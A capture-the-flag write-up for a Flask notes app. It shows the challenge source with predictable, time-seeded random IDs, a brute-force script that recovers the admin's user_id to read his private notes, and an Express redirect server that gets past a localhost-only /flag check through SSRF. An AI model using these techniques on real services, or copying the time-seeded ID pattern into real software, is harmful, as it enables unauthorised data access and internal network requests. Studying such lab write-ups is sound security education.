This was a rather interesting challenge, as initially I did not see any vulnerabilities, and thought to rely on guesswork. But I managed to solve it after trying random things.
The challenge presents us with a link and a truncated copy of the source code.
import string
import random
import time
import datetime
from flask import render_template, redirect, url_for, request, session, Flask
from functools import wraps
from exts import db
from config import Config
from models import User, Note
from forms import CreateNoteForm
from utils import *
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
def login_required(f):
@wraps(f)
def decorated_function(*args, **kws):
if not session.get("username"):
return redirect(url_for('index'))
return f(*args, **kws)
return decorated_function
def get_random_id():
alphabet = list(string.ascii_lowercase + string.digits)
return ''.join([random.choice(alphabet) for _ in range(32)])
@app.route('/')
@app.route('/index')
def index():
results = Note.query.filter_by(prv='False').limit(100).all()
notes = []
for x in results:
note = {}
note['title'] = x.title
note['note_id'] = x.note_id
notes.append(note)
return render_template('index.html', notes=notes)
@app.route('/logout')
@login_required
def logout():
session.pop('username', None)
return redirect(url_for('index'))
@app.route('/create_note', methods=['GET', 'POST'])
def create_note():
try:
form = CreateNoteForm()
if request.method == "POST":
username = form.username.data
title = form.title.data
text = form.body.data
prv = str(form.private.data)
user = User.query.filter_by(username=username).first()
if user:
user_id = user.user_id
else:
timestamp = round(time.time(), 4)
random.seed(timestamp)
user_id = get_random_id()
user = User(username=username, user_id=user_id)
db.session.add(user)
db.session.commit()
session['username'] = username
timestamp = round(time.time(), 4)
post_at = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc).strftime('%Y-%m-%d %H:%M UTC')
random.seed(user_id + post_at)
note_id = get_random_id()
note = Note(user_id=user_id, note_id=note_id,
title=title, text=text,
prv=prv, post_at=post_at)
db.session.add(note)
db.session.commit()
return redirect(url_for('index'))
else:
return render_template("create.html", form=form)
except Exception as e:
pass
@app.route('/my_notes')
def my_notes():
if session.get('username'):
username = session['username']
user_id = User.query.filter_by(username=username).first().user_id
else:
user_id = request.args.get('id')
if not user_id:
return redirect(url_for('index'))
results = Note.query.filter_by(user_id=user_id).limit(100).all()
notes = []
for x in results:
note = {}
note['title'] = x.title
note['note_id'] = x.note_id
notes.append(note)
return render_template("my_notes.html", notes=notes)
@app.route('/view/<_id>')
def view(_id):
note = Note.query.filter_by(note_id=_id).first()
user_id = note.user_id
username = User.query.filter_by(user_id=user_id).first().username
data = {
'post_at': note.post_at,
'title': note.title,
'text': note.text,
'username': username
}
return render_template('note.htmInitial Analysis & Exploration
I managed to find some suspicious segments:
- Getting notes by
user_id(present in source but not in website) - Getting
/flag(present in website but not in source) - We can specifiy the username that the
notebelongs to duringcreate_note, even if it is not ourselves.
Visiting the /flag page, we see that we have to be localhost? Which is a funny check to do.
We also note that the note_id is based on a random string generated from the seed of the user_id and the current date and time, but the seconds do not matter. Immediately, this is suspicious! This means that two notes will have the same note_id if they are created in the same minute. I tried doing that using the website and managed to replicate this behavior.
However, I couldn’t proceed more than this, until my next try.
Trying random things
@app.route('/create_note', methods=['GET', 'POST'])
def create_note():
try:
form = CreateNoteForm()
if request.method == "POST":
username = form.username.data
title = form.title.data
text = form.body.data
prv = str(form.private.data)
user = User.query.filter_by(username=username).first()
if user:
user_id = user.user_id
else:
timestamp = round(time.time(), 4)
random.seed(timestamp)
user_id = get_random_id()
user = User(username=username, user_id=user_id)
db.session.add(user)
db.session.commit()
session['username'] = username
timestamp = round(time.time(), 4)
post_at = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc).strftime('%Y-%m-%d %H:%M UTC')
random.seed(user_id + post_at)
note_id = get_random_id()
note = Note(user_id=user_id, note_id=note_id,
title=title, text=text,
prv=prv, post_at=post_at)
db.session.add(note)
db.session.commit()
return redirect(url_for('index'))
else:
return render_template("create.html", form=form)
except Exception as e:
passFor the first post of a user, his user_id is based of the current system time, rounded off to 4 decimal places. Then, the note_id is based of his user_id and the current system time, but formatted to only minute-accuracy (post_at). The user_id is not known to us, but all the posts’ note_id and post_at is known.
Thus, for the initial post of a user, knowing the post_at, we can brute force the exact time of creation in 4 decimal places to generate a user_id. We can verify if it is correct by generating the note_id from this user_id and post_at and matching it with the actual note_id.
import string
import random
import time
from dateutil.parser import parse
from datetime import datetime
import pytz
# From the app.py
def get_random_id():
alphabet = list(string.ascii_lowercase + string.digits)
return ''.join([random.choice(alphabet) for _ in range(32)])
def gen_userid(time):
random.seed(time)
return get_random_id()
target_time_str = "2021-01-15 02:31 UTC"
target_id = "6mxesnyaqdtaj7tipr7enopo89c40msr"
target_time = datetime.strptime(target_time_str, "%Y-%m-%d %H:%M UTC")
target_time = target_time.replace(tzinfo=pytz.UTC)
target_time = target_time.timestamp()
for i in range(60 * 10000 +1):
t = target_time + (i/10000)
random.seed(t)
user_id = get_random_id()
random.seed(user_id + target_time_str)
nid = get_random_id()
if nid == target_id:
print(user_id)
print("SUCCESS")
break
print("ATTEMPT: "+str(t))This is the script to do so. Trying it with the admin’s first post, we can now view his notes, including his private notes, one of which looks very suspicious.
Random Protection?
That link is a webpage where can enter a url then get the content of the webpage as text. Trying it with the obvious /flag endpoint, we just get the same respones as if we visited the webpage and viewed the source. Same with using http://localhost/flag instead of the full url. But an external webserver giving redirects works:
const app = require("express")();
app.get("/", (req, res) => {
res.redirect("http://localhost/flag");
});
app.listen(3000);Using the URL http://<myip>/ works and gets me the flag printed. Ah, that’s better.
Conclusion
This challenge had a satisying trick to it, so I enjoyed it. Unfortunately, I did not take any pictures, and I only have my python bruteforce script, so this writeup is quite bland. Later on, it was revealed that it was copied from another challenge with added restrictions ._., so I was a bit disappointed.